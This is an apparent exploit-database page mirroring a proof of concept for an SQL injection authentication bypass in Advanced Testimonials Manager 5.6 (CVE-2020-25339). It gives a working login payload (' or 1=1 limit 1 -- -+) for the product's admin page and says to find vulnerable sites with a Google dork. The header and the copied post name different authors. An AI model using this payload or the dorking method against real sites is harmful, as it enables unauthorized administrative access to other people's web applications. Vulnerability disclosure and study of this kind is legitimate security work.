Advertisement






Advanced Testimonials Manager 5.6 SQL Injection

CVE Category Price Severity
CVE-2020-25339 CWE-89 Unknown High
Author Risk Exploitation Type Date
EgiX High Remote 2022-07-05
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022070012

Below is a copy:

Advanced Testimonials Manager 5.6 SQL Injection
====================================================================================================================================
| # Title     : Advanced Testimonials Manager v5.6 Auth by pass Vulnerability                                                      |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | 
| # Vendor    : https://codecanyon.net/item/advanced-testimonials-manager/113257?s_rank=194                                        |  
| # Dork      : Advanced Testimonial Manager                                                                                       |
====================================================================================================================================

poc :


[+] Dorking n Google Or Other Search Enggine.

[+] Use payload : user & pass = ' or 1=1 limit 1 -- -+

[+] http://127.0.0.1/testimonials/admin/index.php

==Greetings to :=========================================================================================================================
|                                                                                                                                       |
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* thelastvvv *Zigoo.eg * moncet              |
|                                                                                                                                       |
=========================================================================================================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.